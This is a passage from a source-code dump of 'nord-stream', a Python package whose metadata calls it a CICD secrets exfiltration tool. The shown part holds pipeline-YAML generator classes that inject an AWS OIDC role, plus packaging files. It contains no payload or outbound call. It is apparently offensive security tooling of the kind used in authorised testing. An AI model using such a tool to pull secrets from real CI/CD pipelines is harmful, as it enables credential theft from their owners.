addAWSInfoForOIDCToYaml(self, role, region): self._defaultTemplate["jobs"]["init"]["steps"][0]["with"]["role-to-assume"] = role self._defaultTemplate["jobs"]["init"]["steps"][0]["with"]["aws-region"] = region ================================================ FILE: nordstream/yaml/gitlab.py ================================================ from nordstream.yaml.generator import YamlGeneratorBase class GitLabPipelineGenerator(YamlGeneratorBase): _defaultTemplate = {} ================================================ FILE: pyproject.toml ================================================ [build-system] requires = ["setuptools", "wheel"] build-backend = "setuptools.build_meta" [project] name = "nord-stream" version = "0.1.0" description = "CICD secrets exfiltration tool" authors = [{ name="@hugow" }, { name="@0hexit"}] license = { text = "GPL-3.0" } dependencies = ["docopt", "PyYAML", "requests", "rich"] [project.scripts] nord-stream = "nordstream.__main__:main" ================================================ FILE: requirements.txt ================================================ docopt PyYAML requests rich